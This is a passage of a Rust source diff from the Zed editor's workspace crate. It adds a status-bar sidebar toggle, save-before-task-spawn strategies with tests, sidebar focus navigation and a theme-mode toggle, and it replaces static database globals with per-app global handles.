.overflow_x_hidden()
+ .when(
+ self.show_sidebar_toggle && !self.workspace_sidebar_open,
+ |this| this.child(self.render_sidebar_toggle(cx)),
+ )
.children(self.left_items.iter().map(|item| item.to_any()))
}
fn render_right_tools(&self) -> impl IntoElement {
h_flex()
+ .flex_shrink_0()
.gap_1()
.overflow_x_hidden()
.children(self.right_items.iter().rev().map(|item| item.to_any()))
}
+
+ fn render_sidebar_toggle(&self, cx: &mut Context<Self>) -> impl IntoElement {
+ h_flex()
+ .gap_0p5()
+ .child(
+ IconButton::new(
+ "toggle-workspace-sidebar",
+ IconName::ThreadsSidebarLeftClosed,
+ )
+ .icon_size(IconSize::Small)
+ .when(self.sidebar_has_notifications, |this| {
+ this.indicator(Indicator::dot().color(Color::Accent))
+ .indicator_border_color(Some(cx.theme().colors().status_bar_background))
+ })
+ .tooltip(move |_, cx| {
+ Tooltip::for_action("Open Threads Sidebar", &ToggleWorkspaceSidebar, cx)
+ })
+ .on_click(move |_, window, cx| {
+ if let Some(multi_workspace) = window.root::<MultiWorkspace>().flatten() {
+ multi_workspace.update(cx, |multi_workspace, cx| {
+ multi_workspace.toggle_sidebar(window, cx);
+ });
+ }
+ }),
+ )
+ .child(Divider::vertical().color(ui::DividerColor::Border))
+ }
}
impl StatusBar {
@@ -92,6 +126,8 @@ impl StatusBar {
this.update_active_pane_item(window, cx)
}),
workspace_sidebar_open: false,
+ sidebar_has_notifications: false,
+ show_sidebar_toggle: false,
};
this.update_active_pane_item(window, cx);
this
@@ -102,6 +138,16 @@ impl StatusBar {
cx.notify();
}
+ pub fn set_sidebar_has_notifications(&mut self, has: bool, cx: &mut Context<Self>) {
+ self.sidebar_has_notifications = has;
+ cx.notify();
+ }
+
+ pub fn set_show_sidebar_toggle(&mut self, show: bool, cx: &mut Context<Self>) {
+ self.show_sidebar_toggle = show;
+ cx.notify();
+ }
+
pub fn add_left_item<T>(&mut self, item: Entity<T>, window: &mut Window, cx: &mut Context<Self>)
where
T: 'static + StatusItemView,
@@ -6,11 +6,13 @@ use language::Buffer;
use project::{TaskSourceKind, WorktreeId};
use remote::ConnectionState;
use task::{
- DebugScenario, ResolvedTask, SharedTaskContext, SpawnInTerminal, TaskContext, TaskTemplate,
+ DebugScenario, ResolvedTask, SaveStrategy, SharedTaskContext, SpawnInTerminal, TaskContext,
+ TaskTemplate,
};
use ui::Window;
+use util::TryFutureExt;
-use crate::{Toast, Workspace, notifications::NotificationId};
+use crate::{SaveIntent, Toast, Workspace, notifications::NotificationId};
impl Workspace {
pub fn schedule_task(
@@ -73,28 +75,57 @@ impl Workspace {
});
}
- if let Some(terminal_provider) = self.terminal_provider.as_ref() {
- let task_status = terminal_provider.spawn(spawn_in_terminal, window, cx);
-
- let task = cx.spawn(async |w, cx| {
- let res = cx.background_spawn(task_status).await;
- match res {
- Some(Ok(status)) => {
- if status.success() {
- log::debug!("Task spawn succeeded");
- } else {
- log::debug!("Task spawn failed, code: {:?}", status.code());
- }
+ if self.terminal_provider.is_some() {
+ let task = cx.spawn_in(window, async move |workspace, cx| {
+ let save_action = match spawn_in_terminal.save {
+ SaveStrategy::All => {
+ let save_all = workspace.update_in(cx, |workspace, window, cx| {
+ let task = workspace.save_all_internal(SaveIntent::SaveAll, window, cx);
+ // Match the type of the other arm by ignoring the bool value returned
+ cx.background_spawn(async { task.await.map(|_| ()) })
+ });
+ save_all.ok()
}
- Some(Err(e)) => {
- log::error!("Task spawn failed: {e:#}");
- _ = w.update(cx, |w, cx| {
- let id = NotificationId::unique::<ResolvedTask>();
- w.show_toast(Toast::new(id, format!("Task spawn failed: {e}")), cx);
- })
+ SaveStrategy::Current => {
+ let save_current = workspace.update_in(cx, |workspace, window, cx| {
+ workspace.save_active_item(SaveIntent::SaveAll, window, cx)
+ });
+ save_current.ok()
}
- None => log::debug!("Task spawn got cancelled"),
+ SaveStrategy::None => None,
};
+ if let Some(save_action) = save_action {
+ save_action.log_err().await;
+ }
+
+ let spawn_task = workspace.update_in(cx, |workspace, window, cx| {
+ workspace
+ .terminal_provider
+ .as_ref()
+ .map(|terminal_provider| {
+ terminal_provider.spawn(spawn_in_terminal, window, cx)
+ })
+ });
+ if let Some(spawn_task) = spawn_task.ok().flatten() {
+ let res = cx.background_spawn(spawn_task).await;
+ match res {
+ Some(Ok(status)) => {
+ if status.success() {
+ log::debug!("Task spawn succeeded");
+ } else {
+ log::debug!("Task spawn failed, code: {:?}", status.code());
+ }
+ }
+ Some(Err(e)) => {
+ log::error!("Task spawn failed: {e:#}");
+ _ = workspace.update(cx, |w, cx| {
+ let id = NotificationId::unique::<ResolvedTask>();
+ w.show_toast(Toast::new(id, format!("Task spawn failed: {e}")), cx);
+ })
+ }
+ None => log::debug!("Task spawn got cancelled"),
+ };
+ }
});
self.scheduled_tasks.push(task);
}
@@ -134,3 +165,166 @@ impl Workspace {
}
}
}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::{
+ TerminalProvider,
+ item::test::{TestItem, TestProjectItem},
+ register_serializable_item,
+ };
+ use gpui::{App, TestAppContext};
+ use parking_lot::Mutex;
+ use project::{FakeFs, Project, TaskSourceKind};
+ use serde_json::json;
+ use std::sync::Arc;
+ use task::TaskTemplate;
+
+ struct Fixture {
+ workspace: Entity<Workspace>,
+ item: Entity<TestItem>,
+ task: ResolvedTask,
+ dirty_before_spawn: Arc<Mutex<Option<bool>>>,
+ }
+
+ #[gpui::test]
+ async fn test_schedule_resolved_task_save_all(cx: &mut TestAppContext) {
+ let (fixture, cx) = create_fixture(cx, SaveStrategy::All).await;
+ fixture.workspace.update_in(cx, |workspace, window, cx| {
+ workspace.schedule_resolved_task(
+ TaskSourceKind::UserInput,
+ fixture.task,
+ false,
+ window,
+ cx,
+ );
+ });
+ cx.executor().run_until_parked();
+
+ assert_eq!(*fixture.dirty_before_spawn.lock(), Some(false));
+ assert!(cx.read(|cx| !fixture.item.read(cx).is_dirty));
+ }
+
+ #[gpui::test]
+ async fn test_schedule_resolved_task_save_current(cx: &mut TestAppContext) {
+ let (fixture, cx) = create_fixture(cx, SaveStrategy::Current).await;
+ // Add a second inactive dirty item
+ let inactive = add_test_item(&fixture.workspace, "file2.txt", false, cx);
+ fixture.workspace.update_in(cx, |workspace, window, cx| {
+ workspace.schedule_resolved_task(
+ TaskSourceKind::UserInput,
+ fixture.task,
+ false,
+ window,
+ cx,
+ );
+ });
+ cx.executor().run_until_parked();
+
+ // The active item (fixture.item) should be saved
+ assert_eq!(*fixture.dirty_before_spawn.lock(), Some(false));
+ assert!(cx.read(|cx| !fixture.item.read(cx).is_dirty));
+ // The inactive item should not be saved
+ assert!(cx.read(|cx| inactive.read(cx).is_dirty));
+ }
+
+ #[gpui::test]
+ async fn test_schedule_resolved_task_save_none(cx: &mut TestAppContext) {
+ let (fixture, cx) = create_fixture(cx, SaveStrategy::None).await;
+ fixture.workspace.update_in(cx, |workspace, window, cx| {
+ workspace.schedule_resolved_task(
+ TaskSourceKind::UserInput,
+ fixture.task,
+ false,
+ window,
+ cx,
+ );
+ });
+ cx.executor().run_until_parked();
+
+ assert_eq!(*fixture.dirty_before_spawn.lock(), Some(true));
+ assert!(cx.read(|cx| fixture.item.read(cx).is_dirty));
+ }
+
+ async fn create_fixture(
+ cx: &mut TestAppContext,
+ save_strategy: SaveStrategy,
+ ) -> (Fixture, &mut gpui::VisualTestContext) {
+ cx.update(|cx| {
+ let settings_store = settings::SettingsStore::test(cx);
+ cx.set_global(settings_store);
+ theme::init(theme::LoadThemes::JustBase, cx);
+ register_serializable_item::<TestItem>(cx);
+ });
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree("/root", json!({ "file.txt": "dirty" }))
+ .await;
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let (workspace, cx) =
+ cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx));
+
+ // Add a dirty item to the workspace
+ let item = add_test_item(&workspace, "file.txt", true, cx);
+
+ let template = TaskTemplate {
+ label: "test".to_string(),
+ command: "echo".to_string(),
+ save: save_strategy,
+ ..Default::default()
+ };
+ let task = template
+ .resolve_task("test", &task::TaskContext::default())
+ .unwrap();
+ let dirty_before_spawn: Arc<Mutex<Option<bool>>> = Arc::default();
+ let terminal_provider = Box::new(TestTerminalProvider {
+ item: item.clone(),
+ dirty_before_spawn: dirty_before_spawn.clone(),
+ });
+ workspace.update(cx, |workspace, _| {
+ workspace.terminal_provider = Some(terminal_provider);
+ });
+ let fixture = Fixture {
+ workspace,
+ item,
+ task,
+ dirty_before_spawn,
+ };
+ (fixture, cx)
+ }
+
+ fn add_test_item(
+ workspace: &Entity<Workspace>,
+ name: &str,
+ active: bool,
+ cx: &mut gpui::VisualTestContext,
+ ) -> Entity<TestItem> {
+ let item = cx.new(|cx| {
+ TestItem::new(cx)
+ .with_dirty(true)
+ .with_project_items(&[TestProjectItem::new(1, name, cx)])
+ });
+ workspace.update_in(cx, |workspace, window, cx| {
+ let pane = workspace.active_pane().clone();
+ workspace.add_item(pane, Box::new(item.clone()), None, true, active, window, cx);
+ });
+ item
+ }
+
+ struct TestTerminalProvider {
+ item: Entity<TestItem>,
+ dirty_before_spawn: Arc<Mutex<Option<bool>>>,
+ }
+
+ impl TerminalProvider for TestTerminalProvider {
+ fn spawn(
+ &self,
+ _task: task::SpawnInTerminal,
+ _window: &mut ui::Window,
+ cx: &mut App,
+ ) -> Task<Option<Result<ExitStatus>>> {
+ *self.dirty_before_spawn.lock() = Some(cx.read_entity(&self.item, |e, _| e.is_dirty));
+ Task::ready(Some(Ok(ExitStatus::default())))
+ }
+ }
+}
@@ -1,6 +1,7 @@
use crate::{
- NewFile, Open, PathList, SerializedWorkspaceLocation, WORKSPACE_DB, Workspace, WorkspaceId,
+ NewFile, Open, PathList, SerializedWorkspaceLocation, Workspace, WorkspaceId,
item::{Item, ItemEvent},
+ persistence::WorkspaceDb,
};
use chrono::{DateTime, Utc};
use git::Clone as GitClone;
@@ -271,9 +272,10 @@ impl WelcomePage {
let fs = workspace
.upgrade()
.map(|ws| ws.read(cx).app_state().fs.clone());
+ let db = WorkspaceDb::global(cx);
cx.spawn_in(window, async move |this: WeakEntity<Self>, cx| {
let Some(fs) = fs else { return };
- let workspaces = WORKSPACE_DB
+ let workspaces = db
.recent_workspaces_on_disk(fs.as_ref())
.await
.log_err()
@@ -518,7 +520,7 @@ impl crate::SerializableItem for WelcomePage {
alive_items,
workspace_id,
"welcome_pages",
- &persistence::WELCOME_PAGES,
+ &persistence::WelcomePagesDb::global(cx),
cx,
)
}
@@ -531,7 +533,7 @@ impl crate::SerializableItem for WelcomePage {
window: &mut Window,
cx: &mut App,
) -> Task<gpui::Result<Entity<Self>>> {
- if persistence::WELCOME_PAGES
+ if persistence::WelcomePagesDb::global(cx)
.get_welcome_page(item_id, workspace_id)
.ok()
.is_some_and(|is_open| is_open)
@@ -553,11 +555,10 @@ impl crate::SerializableItem for WelcomePage {
cx: &mut Context<Self>,
) -> Option<Task<gpui::Result<()>>> {
let workspace_id = workspace.database_id()?;
- Some(cx.background_spawn(async move {
- persistence::WELCOME_PAGES
- .save_welcome_page(item_id, workspace_id, true)
- .await
- }))
+ let db = persistence::WelcomePagesDb::global(cx);
+ Some(cx.background_spawn(
+ async move { db.save_welcome_page(item_id, workspace_id, true).await },
+ ))
}
fn should_serialize(&self, event: &Self::Event) -> bool {
@@ -591,7 +592,7 @@ mod persistence {
)]);
}
- db::static_connection!(WELCOME_PAGES, WelcomePagesDb, [WorkspaceDb]);
+ db::static_connection!(WelcomePagesDb, [WorkspaceDb]);
impl WelcomePagesDb {
query! {
@@ -27,9 +27,9 @@ mod workspace_settings;
pub use crate::notifications::NotificationFrame;
pub use dock::Panel;
pub use multi_workspace::{
- DraggedSidebar, FocusWorkspaceSidebar, MultiWorkspace, MultiWorkspaceEvent,
- NewWorkspaceInWindow, NextWorkspaceInWindow, PreviousWorkspaceInWindow, Sidebar, SidebarEvent,
- SidebarHandle, ToggleWorkspaceSidebar,
+ CloseWorkspaceSidebar, DraggedSidebar, FocusWorkspaceSidebar, MultiWorkspace,
+ MultiWorkspaceEvent, NextWorkspace, PreviousWorkspace, Sidebar, SidebarHandle,
+ ToggleWorkspaceSidebar,
};
pub use path_list::{PathList, SerializedPathList};
pub use toast_layer::{ToastAction, ToastLayer, ToastView};
@@ -76,14 +76,14 @@ pub use pane_group::{
ActivePaneDecorator, HANDLE_HITBOX_SIZE, Member, PaneAxis, PaneGroup, PaneRenderContext,
SplitDirection,
};
-use persistence::{DB, SerializedWindowBounds, model::SerializedWorkspace};
+use persistence::{SerializedWindowBounds, model::SerializedWorkspace};
pub use persistence::{
- DB as WORKSPACE_DB, WorkspaceDb, delete_unloaded_items,
+ WorkspaceDb, delete_unloaded_items,
model::{
DockStructure, ItemId, SerializedMultiWorkspace, SerializedWorkspaceLocation,
SessionWorkspace,
},
- read_serialized_multi_workspaces,
+ read_serialized_multi_workspaces, resolve_worktree_workspaces,
};
use postage::stream::Stream;
use project::{
@@ -146,7 +146,7 @@ pub use workspace_settings::{
AutosaveSetting, BottomDockLayout, RestoreOnStartupBehavior, StatusBarSettings, TabBarSettings,
WorkspaceSettings,
};
-use zed_actions::{Spawn, feedback::FileBugReport};
+use zed_actions::{Spawn, feedback::FileBugReport, theme::ToggleMode};
use crate::{item::ItemBufferKind, notifications::NotificationId};
use crate::{
@@ -400,7 +400,12 @@ pub struct Save {
pub save_intent: Option<SaveIntent>,
}
-/// Closes all items and panes in the workspace.
+/// Moves focus to the central panes in the workspace.
+#[derive(Clone, Debug, PartialEq, Eq, Action)]
+#[action(namespace = workspace)]
+pub struct FocusCenterPane;
+
+/// Closes all items and panes in the workspace.
#[derive(Clone, PartialEq, Debug, Deserialize, Default, JsonSchema, Action)]
#[action(namespace = workspace)]
#[serde(deny_unknown_fields)]
@@ -659,7 +664,7 @@ fn prompt_and_open_paths(app_state: Arc<AppState>, options: PathPromptOptions, c
} else {
let task = Workspace::new_local(Vec::new(), app_state.clone(), None, None, None, true, cx);
cx.spawn(async move |cx| {
- let (window, _) = task.await?;
+ let OpenResult { window, .. } = task.await?;
window.update(cx, |multi_workspace, window, cx| {
window.activate_window();
let workspace = multi_workspace.workspace().clone();
@@ -1336,6 +1341,7 @@ pub struct Workspace {
last_open_dock_positions: Vec<DockPosition>,
removing: bool,
_panels_task: Option<Task<Result<()>>>,
+ sidebar_focus_handle: Option<FocusHandle>,
}
impl EventEmitter<Event> for Workspace {}
@@ -1377,10 +1383,10 @@ impl Workspace {
|new_trusted_worktrees, cx| {
let timeout =
cx.background_executor().timer(SERIALIZATION_THROTTLE_TIME);
+ let db = WorkspaceDb::global(cx);
cx.background_spawn(async move {
timeout.await;
- persistence::DB
- .save_trusted_worktrees(new_trusted_worktrees)
+ db.save_trusted_worktrees(new_trusted_worktrees)
.await
.log_err();
})
@@ -1414,7 +1420,13 @@ impl Workspace {
this.collaborator_left(*peer_id, window, cx);
}
- &project::Event::WorktreeRemoved(id) | &project::Event::WorktreeAdded(id) => {
+ &project::Event::WorktreeRemoved(_) => {
+ this.update_window_title(window, cx);
+ this.serialize_workspace(window, cx);
+ this.update_history(cx);
+ }
+
+ &project::Event::WorktreeAdded(id) => {
this.update_window_title(window, cx);
if this
.project()
@@ -1741,6 +1753,7 @@ impl Workspace {
scheduled_tasks: Vec::new(),
last_open_dock_positions: Vec::new(),
removing: false,
+ sidebar_focus_handle: None,
}
}
@@ -1752,12 +1765,7 @@ impl Workspace {
init: Option<Box<dyn FnOnce(&mut Workspace, &mut Window, &mut Context<Workspace>) + Send>>,
activate: bool,
cx: &mut App,
- ) -> Task<
- anyhow::Result<(
- WindowHandle<MultiWorkspace>,
- Vec<Option<anyhow::Result<Box<dyn ItemHandle>>>>,
- )>,
- > {
+ ) -> Task<anyhow::Result<OpenResult>> {
let project_handle = Project::local(
app_state.client.clone(),
app_state.node_runtime.clone(),
@@ -1769,6 +1777,8 @@ impl Workspace {
cx,
);
+ let db = WorkspaceDb::global(cx);
+ let kvp = db::kvp::KeyValueStore::global(cx);
cx.spawn(async move |cx| {
let mut paths_to_open = Vec::with_capacity(abs_paths.len());
for path in abs_paths.into_iter() {
@@ -1779,8 +1789,7 @@ impl Workspace {
}
}
- let serialized_workspace =
- persistence::DB.workspace_for_roots(paths_to_open.as_slice());
+ let serialized_workspace = db.workspace_for_roots(paths_to_open.as_slice());
if let Some(paths) = serialized_workspace.as_ref().map(|ws| &ws.paths) {
paths_to_open = paths.ordered_paths().cloned().collect();
@@ -1812,10 +1821,10 @@ impl Workspace {
let workspace_id = if let Some(serialized_workspace) = serialized_workspace.as_ref() {
serialized_workspace.id
} else {
- DB.next_id().await.unwrap_or_else(|_| Default::default())
+ db.next_id().await.unwrap_or_else(|_| Default::default())
};
- let toolchains = DB.toolchains(workspace_id).await?;
+ let toolchains = db.toolchains(workspace_id).await?;
for (toolchain, worktree_path, path) in toolchains {
let toolchain_path = PathBuf::from(toolchain.path.clone().to_string());
@@ -1898,7 +1907,7 @@ impl Workspace {
// Reopening an existing workspace - restore its saved bounds
(Some(bounds.0), Some(display))
} else if let Some((display, bounds)) =
- persistence::read_default_window_bounds()
+ persistence::read_default_window_bounds(&kvp)
{
// New or empty workspace - use the last known window bounds
(Some(bounds), Some(display))
@@ -1969,7 +1978,7 @@ impl Workspace {
// 1. This is an empty workspace (no paths), AND
// 2. The serialized workspace either doesn't exist or has no paths
if is_empty_workspace && !serialized_workspace_has_paths {
- if let Some(default_docks) = persistence::read_default_dock_state() {
+ if let Some(default_docks) = persistence::read_default_dock_state(&kvp) {
window
.update(cx, |_, window, cx| {
workspace.update(cx, |workspace, cx| {
@@ -1997,7 +2006,11 @@ impl Workspace {
});
})
.log_err();
- Ok((window, opened_items))
+ Ok(OpenResult {
+ window,
+ workspace,
+ opened_items,
+ })
})
}
@@ -2154,12 +2167,24 @@ impl Workspace {
&self.status_bar
}
- pub fn set_workspace_sidebar_open(&self, open: bool, cx: &mut App) {
+ pub fn set_workspace_sidebar_open(
+ &self,
+ open: bool,
+ has_notifications: bool,
+ show_toggle: bool,
+ cx: &mut App,
+ ) {
self.status_bar.update(cx, |status_bar, cx| {
status_bar.set_workspace_sidebar_open(open, cx);
+ status_bar.set_sidebar_has_notifications(has_notifications, cx);
+ status_bar.set_show_sidebar_toggle(show_toggle, cx);
});
}
+ pub fn set_sidebar_focus_handle(&mut self, handle: Option<FocusHandle>) {
+ self.sidebar_focus_handle = handle;
+ }
+
pub fn status_bar_visible(&self, cx: &App) -> bool {
StatusBarSettings::get_global(cx).show
}
@@ -2691,7 +2716,10 @@ impl Workspace {
cx,
);
cx.spawn_in(window, async move |_vh, cx| {
- let (multi_workspace_window, _) = task.await?;
+ let OpenResult {
+ window: multi_workspace_window,
+ ..
+ } = task.await?;
multi_workspace_window.update(cx, |multi_workspace, window, cx| {
let workspace = multi_workspace.workspace().clone();
workspace.update(cx, |workspace, cx| callback(workspace, window, cx))
@@ -2729,7 +2757,10 @@ impl Workspace {
cx,
);
cx.spawn_in(window, async move |_vh, cx| {
- let (multi_workspace_window, _) = task.await?;
+ let OpenResult {
+ window: multi_workspace_window,
+ ..
+ } = task.await?;
multi_workspace_window.update(cx, |multi_workspace, window, cx| {
let workspace = multi_workspace.workspace().clone();
workspace.update(cx, |workspace, cx| callback(workspace, window, cx))
@@ -3108,7 +3139,7 @@ impl Workspace {
paths: Vec<PathBuf>,
window: &mut Window,
cx: &mut Context<Self>,
- ) -> Task<Result<()>> {
+ ) -> Task<Result<Entity<Workspace>>> {
let window_handle = window.window_handle().downcast::<MultiWorkspace>();
let is_remote = self.project.read(cx).is_via_collab();
let has_worktree = self.project.read(cx).worktrees(cx).next().is_some();
@@ -3124,19 +3155,20 @@ impl Workspace {
let app_state = self.app_state.clone();
cx.spawn(async move |_, cx| {
- cx.update(|cx| {
- open_paths(
- &paths,
- app_state,
- OpenOptions {
- replace_window: window_to_replace,
- ..Default::default()
- },
- cx,
- )
- })
- .await?;
- Ok(())
+ let OpenResult { workspace, .. } = cx
+ .update(|cx| {
+ open_paths(
+ &paths,
+ app_state,
+ OpenOptions {
+ replace_window: window_to_replace,
+ ..Default::default()
+ },
+ cx,
+ )
+ })
+ .await?;
+ Ok(workspace)
})
}
@@ -3341,7 +3373,7 @@ impl Workspace {
.map(|wt| wt.read(cx).abs_path().as_ref().to_path_buf())
}
- fn add_folder_to_project(
+ pub fn add_folder_to_project(
&mut self,
_: &AddFolderToProject,
window: &mut Window,
@@ -3819,6 +3851,14 @@ impl Workspace {
did_focus_panel
}
+ pub fn focus_center_pane(&mut self, window: &mut Window, cx: &mut Context<Self>) {
+ if let Some(item) = self.active_item(cx) {
+ item.item_focus_handle(cx).focus(window, cx);
+ } else {
+ log::error!("Could not find a focus target when switching focus to the center panes",);
+ }
+ }
+
pub fn activate_panel_for_proto_id(
&mut self,
panel_id: PanelId,
@@ -4463,26 +4503,35 @@ impl Workspace {
) {
use ActivateInDirectionTarget as Target;
enum Origin {
+ Sidebar,
LeftDock,
RightDock,
BottomDock,
Center,
}
- let origin: Origin = [
- (&self.left_dock, Origin::LeftDock),
- (&self.right_dock, Origin::RightDock),
- (&self.bottom_dock, Origin::BottomDock),
- ]
- .into_iter()
- .find_map(|(dock, origin)| {
- if dock.focus_handle(cx).contains_focused(window, cx) && dock.read(cx).is_open() {
- Some(origin)
- } else {
- None
- }
- })
- .unwrap_or(Origin::Center);
+ let origin: Origin = if self
+ .sidebar_focus_handle
+ .as_ref()
+ .is_some_and(|h| h.contains_focused(window, cx))
+ {
+ Origin::Sidebar
+ } else {
+ [
+ (&self.left_dock, Origin::LeftDock),
+ (&self.right_dock, Origin::RightDock),
+ (&self.bottom_dock, Origin::BottomDock),
+ ]
+ .into_iter()
+ .find_map(|(dock, origin)| {
+ if dock.focus_handle(cx).contains_focused(window, cx) && dock.read(cx).is_open() {
+ Some(origin)
+ } else {
+ None
+ }
+ })
+ .unwrap_or(Origin::Center)
+ };
let get_last_active_pane = || {
let pane = self
@@ -4501,7 +4550,20 @@ impl Workspace {
let try_dock =
|dock: &Entity<Dock>| dock.read(cx).is_open().then(|| Target::Dock(dock.clone()));
+ let sidebar_target = self
+ .sidebar_focus_handle
+ .as_ref()
+ .map(|h| Target::Sidebar(h.clone()));
+
let target = match (origin, direction) {
+ // From the sidebar, only Right navigates into the workspace.
+ (Origin::Sidebar, SplitDirection::Right) => try_dock(&self.left_dock)
+ .or_else(|| get_last_active_pane().map(Target::Pane))
+ .or_else(|| try_dock(&self.bottom_dock))
+ .or_else(|| try_dock(&self.right_dock)),
+
+ (Origin::Sidebar, _) => None,
+
// We're in the center, so we first try to go to a different pane,
// otherwise try to go to a dock.
(Origin::Center, direction) => {
@@ -4511,7 +4573,7 @@ impl Workspace {
match direction {
SplitDirection::Up => None,
SplitDirection::Down => try_dock(&self.bottom_dock),
- SplitDirection::Left => try_dock(&self.left_dock),
+ SplitDirection::Left => try_dock(&self.left_dock).or(sidebar_target),
SplitDirection::Right => try_dock(&self.right_dock),
}
}
@@ -4525,18 +4587,24 @@ impl Workspace {
}
}
+ (Origin::LeftDock, SplitDirection::Left) => sidebar_target,
+
(Origin::LeftDock, SplitDirection::Down)
| (Origin::RightDock, SplitDirection::Down) => try_dock(&self.bottom_dock),
(Origin::BottomDock, SplitDirection::Up) => get_last_active_pane().map(Target::Pane),
- (Origin::BottomDock, SplitDirection::Left) => try_dock(&self.left_dock),
+ (Origin::BottomDock, SplitDirection::Left) => {
+ try_dock(&self.left_dock).or(sidebar_target)
+ }
(Origin::BottomDock, SplitDirection::Right) => try_dock(&self.right_dock),
(Origin::RightDock, SplitDirection::Left) => {
if let Some(last_active_pane) = get_last_active_pane() {
Some(Target::Pane(last_active_pane))
} else {
- try_dock(&self.bottom_dock).or_else(|| try_dock(&self.left_dock))
+ try_dock(&self.bottom_dock)
+ .or_else(|| try_dock(&self.left_dock))
+ .or(sidebar_target)
}
}
@@ -4565,6 +4633,9 @@ impl Workspace {
}
})
}
+ Some(ActivateInDirectionTarget::Sidebar(focus_handle)) => {
+ focus_handle.focus(window, cx);
+ }
None => {}
}
}
@@ -5924,7 +5995,8 @@ impl Workspace {
self.update_active_view_for_followers(window, cx);
if let Some(database_id) = self.database_id {
- cx.background_spawn(persistence::DB.update_timestamp(database_id))
+ let db = WorkspaceDb::global(cx);
+ cx.background_spawn(async move { db.update_timestamp(database_id).await })
.detach();
}
} else {
@@ -5973,6 +6045,7 @@ impl Workspace {
self.database_id
}
+ #[cfg(any(test, feature = "test-support"))]
pub(crate) fn set_database_id(&mut self, id: WorkspaceId) {
self.database_id = Some(id);
}
@@ -5992,15 +6065,17 @@ impl Workspace {
let window_bounds = window.inner_window_bounds();
let database_id = self.database_id;
let has_paths = !self.root_paths(cx).is_empty();
+ let db = WorkspaceDb::global(cx);
+ let kvp = db::kvp::KeyValueStore::global(cx);
cx.background_executor().spawn(async move {
if !has_paths {
- persistence::write_default_window_bounds(window_bounds, display_uuid)
+ persistence::write_default_window_bounds(&kvp, window_bounds, display_uuid)
.await
.log_err();
}
if let Some(database_id) = database_id {
- DB.set_window_open_status(
+ db.set_window_open_status(
database_id,
SerializedWindowBounds(window_bounds),
display_uuid,
@@ -6008,7 +6083,7 @@ impl Workspace {
.await
.log_err();
} else {
- persistence::write_default_window_bounds(window_bounds, display_uuid)
+ persistence::write_default_window_bounds(&kvp, window_bounds, display_uuid)
.await
.log_err();
}
@@ -6197,8 +6272,9 @@ impl Workspace {
user_toolchains,
};
+ let db = WorkspaceDb::global(cx);
window.spawn(cx, async move |_| {
- persistence::DB.save_workspace(serialized_workspace).await;
+ db.save_workspace(serialized_workspace).await;
})
}
WorkspaceLocation::DetachFromSession => {
@@ -6206,27 +6282,30 @@ impl Workspace {
let display = window.display(cx).and_then(|d| d.uuid().ok());
// Save dock state for empty local workspaces
let docks = build_serialized_docks(self, window, cx);
+ let db = WorkspaceDb::global(cx);
+ let kvp = db::kvp::KeyValueStore::global(cx);
window.spawn(cx, async move |_| {
- persistence::DB
- .set_window_open_status(
- database_id,
- window_bounds,
- display.unwrap_or_default(),
- )
- .await
- .log_err();
- persistence::DB
- .set_session_id(database_id, None)
+ db.set_window_open_status(
+ database_id,
+ window_bounds,
+ display.unwrap_or_default(),
+ )
+ .await
+ .log_err();
+ db.set_session_id(database_id, None).await.log_err();
+ persistence::write_default_dock_state(&kvp, docks)
.await
.log_err();
- persistence::write_default_dock_state(docks).await.log_err();
})
}
WorkspaceLocation::None => {
// Save dock state for empty non-local workspaces
let docks = build_serialized_docks(self, window, cx);
+ let kvp = db::kvp::KeyValueStore::global(cx);
window.spawn(cx, async move |_| {
- persistence::write_default_dock_state(docks).await.log_err();
+ persistence::write_default_dock_state(&kvp, docks)
+ .await
+ .log_err();
})
}
}
@@ -6505,6 +6584,7 @@ impl Workspace {
.on_action(cx.listener(Self::move_item_to_pane_at_index))
.on_action(cx.listener(Self::move_focused_panel_to_next_position))
.on_action(cx.listener(Self::toggle_edit_predictions_all_files))
+ .on_action(cx.listener(Self::toggle_theme_mode))
.on_action(cx.listener(|workspace, _: &Unfollow, window, cx| {
let pane = workspace.active_pane().clone();
workspace.unfollow_in_pane(&pane, window, cx);
@@ -6655,9 +6735,9 @@ impl Workspace {
trusted_worktrees.update(cx, |trusted_worktrees, _| {
trusted_worktrees.clear_trusted_paths()
});
- let clear_task = persistence::DB.clear_trusted_worktrees();
+ let db = WorkspaceDb::global(cx);
cx.spawn(async move |_, cx| {
- if clear_task.await.log_err().is_some() {
+ if db.clear_trusted_worktrees().await.log_err().is_some() {
cx.update(|cx| reload(cx));
}
})
@@ -6845,6 +6925,9 @@ impl Workspace {
}
}),
)
+ .on_action(cx.listener(|workspace, _: &FocusCenterPane, window, cx| {
+ workspace.focus_center_pane(window, cx);
+ }))
.on_action(cx.listener(Workspace::cancel))
}
@@ -6922,6 +7005,12 @@ impl Workspace {
self.modal_layer.read(cx).has_active_modal()
}
+ pub fn is_active_modal_command_palette(&self, cx: &mut App) -> bool {
+ self.modal_layer
+ .read(cx)
+ .is_active_modal_command_palette(cx)
+ }
+
pub fn active_modal<V: ManagedView + 'static>(&self, cx: &App) -> Option<Entity<V>> {
self.modal_layer.read(cx).active_modal()
}
@@ -6960,8 +7049,12 @@ impl Workspace {
) {
self.centered_layout = !self.centered_layout;
if let Some(database_id) = self.database_id() {
- cx.background_spawn(DB.set_centered_layout(database_id, self.centered_layout))
- .detach_and_log_err(cx);
+ let db = WorkspaceDb::global(cx);
+ let centered_layout = self.centered_layout;
+ cx.background_spawn(async move {
+ db.set_centered_layout(database_id, centered_layout).await
+ })
+ .detach_and_log_err(cx);
}
cx.notify();
}
@@ -7159,6 +7252,23 @@ impl Workspace {
});
}
+ fn toggle_theme_mode(&mut self, _: &ToggleMode, _window: &mut Window, cx: &mut Context<Self>) {
+ let current_mode = ThemeSettings::get_global(cx).theme.mode();
+ let next_mode = match current_mode {
+ Some(theme::ThemeAppearanceMode::Light) => theme::ThemeAppearanceMode::Dark,
+ Some(theme::ThemeAppearanceMode::Dark) => theme::ThemeAppearanceMode::Light,
+ Some(theme::ThemeAppearanceMode::System) | None => match cx.theme().appearance() {
+ theme::Appearance::Light => theme::ThemeAppearanceMode::Dark,
+ theme::Appearance::Dark => theme::ThemeAppearanceMode::Light,
+ },
+ };
+
+ let fs = self.project().read(cx).fs().clone();
+ settings::update_settings_file(fs, cx, move |settings, _cx| {
+ theme::set_mode(settings, next_mode);
+ });
+ }
+
pub fn show_worktree_trust_security_modal(
&mut self,
toggle: bool,
@@ -7250,6 +7360,12 @@ impl GlobalAnyActiveCall {
cx.global()
}
}
+
